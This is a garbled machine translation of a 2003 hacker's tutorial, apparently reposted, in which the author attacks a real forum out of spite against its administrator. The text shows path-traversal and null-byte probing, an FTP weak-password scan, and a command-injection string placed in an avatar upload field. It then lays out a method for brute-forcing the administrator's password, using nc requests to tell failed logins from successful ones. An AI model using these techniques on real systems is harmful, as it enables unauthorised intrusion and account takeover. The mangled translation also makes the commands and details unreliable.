2. Tech
  3. A simple script attack instance

A simple script attack instance

xiaoxiao2021-03-06  67

Creation time: 2004-01-19

Article attribute: original

Article submission:

THE0CRAT (THE0CRAT_AT_HOTMAIL.COM)

######################################################################################################################################################################################################################################################################################################## ##############################

A simple script attack instance

Author: HBU Group · The0crat

E-mail: the0crat@hotmail.com

Japanese issue: 2003/8/18

######################################################################################################################################################################################################################################################################################################## ##############################

First, open

I am bored today, go to a community in the region, those people have smear, there is a post also infringe on a friend's copyright, and it is said that there are a few words, the administrator doesn't matter, it doesn't look at it. Go down, I plan to wake up to the administrator basin.

Second, preparation / analysis

Safety first, first open an HTTP agent, open the community's landing page, see the URL shown above is

http://www.6***bbs.com/login.cgi

Open the source code of the page, find the key to the login:

Password:

Therefore, the URL that submits the login information should be

http://wwww.****bbs.com/login.cgi? UserName = ID & Userpsd = PWD & Menu = Login & ID =

Habo first view user information, because the username and password are tightly saved in general, where we are more likely to approach what we want. Submit the following URL to view Silkroad User Information:

http://www.****bbs.com/yhreg.cgi? Menu = Viewuser & UserName = SILKROAD

Return normal user information

http://www.****bbs.com/yhreg.cgi? Menu = Viewuser & UserName =. / Silkroad

Also return normal user information, it seems. And / already filtered off

http://www.****bbs.com/yhreg.cgi? Menu = Viewuser & UserName = Silkroad% 00

Tip This user is not registered: (

Scan, there is FTP weak password ~ ​​Unfortunately, Anonymous is not large.

Back to CGI, only

Http://www.****bbs.com/rank.cgi found that YUZi's BBS3000 is found. You can also download the BBS3000 analysis source code, but more time, let's take a few sensitive places to see http://www.6***bbs.com/photo.ci can upload avatars

Since the display of the avatar is

The key is in *** here, that is, the connection

Fill in QQ ~; Open F, "> the0crat.txt"; . GIF will be submitted, there is no prompt, and the program has not been made Any change

In order to see if you don't analyze source code, you don't invade the target server, then you will try to detect the password of the community administrator, it is difficult to say that I am lucky today :)

Of course, the administrators on the community will not be idiots, and they will not set an empty password. Refer to the password of the detection forum ID, what is the first thing you first? Download a big and interesting hacker software to hang a dictionary? Don't you want to write a script to break the impulse?嘿嘿. Now teach you your own step by step to detect your password :)

The general method of password detection is

1 acquisition of the password list for pre-speculation

|

|

|

2 Submit your password to the target <---------

| | |

| | |

| | |

3 Determine whether the password is correct according to the target response |

| | | | |

| | | | |

| | | | |

Password correct password error |

| | | | |

| | | | |

| | | | |

Return to user password next -----------------

The third step is to go around a circle, and other steps can be easily implemented.

So start from the third step:

I don't understand how other programs are judged. It is estimated to first obtain the code of the two pages of successful landing and password incorrect, and then compare the differences of their differences, there may be other ways, but I haven't thought ~~ ~ :)

So, first register a ID, account asdfasdf, password asdfasdf, according to the information obtained earlier, this ID submitted URL is

Http://www.****bbs.com/login.cgi? username = asdfasdf & userpsd = asdfasdf & menu = login & id =, "username =" later is the user ID, "UserPSD =" later is the user password, then Community

Now use Telnet to get what we want:

F: /> nc -vv www. **** bbs.com 80 <<<--- with the port of the NC connected to the target web service, don't say what you don't know if NC is, 嘿嘿

Warning: Inverse host lookup failed for ***. ***. ***. ***: h_errno 11004: no_dataww. **** bbs.com [***. ***. ***. ** *] 80 (http) Open

Get

http://www.****bbs.com/login.cgi? username = asdfasdf & userpsd = error & menu = login & id = http / 1.1 <<< ------- Here you will use The user logs in the URL of the information, but the error password is used.

Host: Iis-Server

HTTP / 1.1 200 ok

Date: Mon, 18 Aug 2003 11:59:41 GMT

Server: Apache / 1.3.26 (UNIX) PHP / 4.0.6

Transfer-encoding: chunked

Content-Type: Text / HTML

Fe7 <<< ------------ Note this

......

This is the information returned after the non-successful landing

Come:

F: /> nc -vv www. **** bbs.com 80

Warning: inverse host lookup failed for ***. ***. ***. ***: h_errno 11004: no_data

Www. **** bbs.com [***. ***. ***. ***] 80 (http) open

Get

http://www.****bbs.com/login.cgi? username = asdfasdf & userpsd = asdfasdf & menu = login & id = http / 1.1 <<< ------- This is the right password

Host: IIS-Server

HTTP / 1.1 200 ok

Date: Mon, 18 Aug 2003 12:09:43 GMT

Server: Apache / 1.3.26 (UNIX) PHP / 4.0.6

Transfer-encoding: chunked

Content-Type: Text / HTML

18D <<< ------------ Note this